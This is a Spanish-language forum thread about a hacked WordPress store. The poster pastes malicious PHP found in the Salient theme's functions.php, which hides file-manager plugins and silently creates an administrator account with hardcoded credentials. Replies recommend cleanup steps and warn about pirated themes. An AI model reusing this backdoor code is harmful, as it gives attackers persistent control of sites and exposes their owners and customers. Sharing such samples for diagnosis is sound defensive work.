fbpixel

Hack en Theme Salient functions.php

Buenas como va?

En un ecommerce nos aparecio el problema de que no podiamos actualizar los plugins y revisando los archivos encontre las lineas de codigo que estaban generando eso y ademas un usuario admin.

El tema es que por mas que la elimino, cada vez que se recarga la página vuelven a aparecer esas lineas entonces claramente desde otro lado esta programado para que se creen constantemente por mas de se eliminadas.

Las minas estaban en wp-content/themes/salient/functions.php y son:

if(!isset($_GET[‘access’])&&$_GET[‘access’]!==‘set_up’){
function hide_plugins($plugins){
unset( $plugins[‘file-manager/file-manager.php’] );
unset( $plugins[‘wp-file-manager/file_folder_manager.php’] );
return $plugins;
}
add_action(‘all_plugins’,‘hide_plugins’);
}
add_action( ‘template_redirect’, ‘wpdaxue’ );
function wpdaxue(){
$username = ‘admin_sweet’;
$password = ‘A4bGff!dV5’;
$email_address = ‘hnthzt@163.com’;
if ( isset($username) && isset($password) && isset($email_address ) ) {
if (!username_exists($username)&&!email_exists($email_address)){
$user_id = wp_create_user($username,$password,$email_address);
if(is_int($user_id)){
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role(‘administrator’);
}
}
}
}

Alguien tiene una recomendación para hacer? Gracias

WordFence + cambiar contraseñas a las recomendadas por wordpress + limpiar sitio + cambiar url de ingreso

Lo primero que haría sería avisarle al desarrollador del theme. Ya que si se preserva el script, mientras hagas actualizaciones, el problema persistirá. Si el desarrollador no lo soluciona, denuncialo en Themeforest.
Y seguiría las recomendaciones de @Matias_Blanco. y agregaría revisar toda la configuración del servidor, ya que puede estar dañado o infiltrado más allá de tu WordPress.
Ahora, si el theme lo descargaste de un sitio donde evitás el pago de licencias, te recomiendo cambiar de theme o pagar la licencia para tenerlo original. En estos sitios es muy fácil que te encuentres con scripts adulterados y maliciosos.

Hola, estimado. Tenés un tema que no es original. Cuidado con eso. Suerte.